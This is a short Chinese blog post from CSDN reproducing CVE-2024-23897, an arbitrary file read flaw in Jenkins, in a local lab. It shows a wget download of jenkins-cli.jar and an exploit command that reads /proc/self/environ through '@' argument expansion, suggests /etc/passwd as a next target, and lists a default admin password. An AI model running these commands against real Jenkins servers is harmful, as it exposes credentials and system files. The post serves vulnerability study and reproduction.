CVE-2024-23897 JenKins任意文件读取漏洞复现(1)

本文详细介绍了CVE-2024-23897 Jenkins任意文件读取漏洞的复现过程,包括下载Jenkins-cli.jar并利用其读取Jenkins基本目录。此外,还探讨了如何开启匿名访问权限,以及作者提供的网络安全学习资源,包括学习路线图、视频教程、工具箱、实战项目和面试题,旨在帮助网络安全工程师提升技能。
摘要由CSDN通过智能技术生成

地址:kali本地IP:8081        默认管理员账号密码:user/bitnami

三、漏洞利用
3.1 下载JenKins-cli.jar包

我们发现使用wget命令可以在外部将JenKins-cli.jar包下载至桌面

wget http://localhost:8081/jnlpJars/jenkins-cli.jar

通过Jenkins-cli.jar包进行 读取文件以获取 Jenkins 基本目录:

java -jar jenkins-cli.jar -s http://localhost:8081/ -http help 1 “@/proc/self/environ”

OK

四、扩展

利用JenKins-cli.jar包探索敏感目录文件;例如:/etc/passwd

在这里我们发现左边是只有一条是暴露。

开启匿名者访问权限
选项在后台的”Manage Jenkins“->"security"中管理员可将其开启或关闭。默认是关闭的。

自我介绍一下,小编13年上

  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值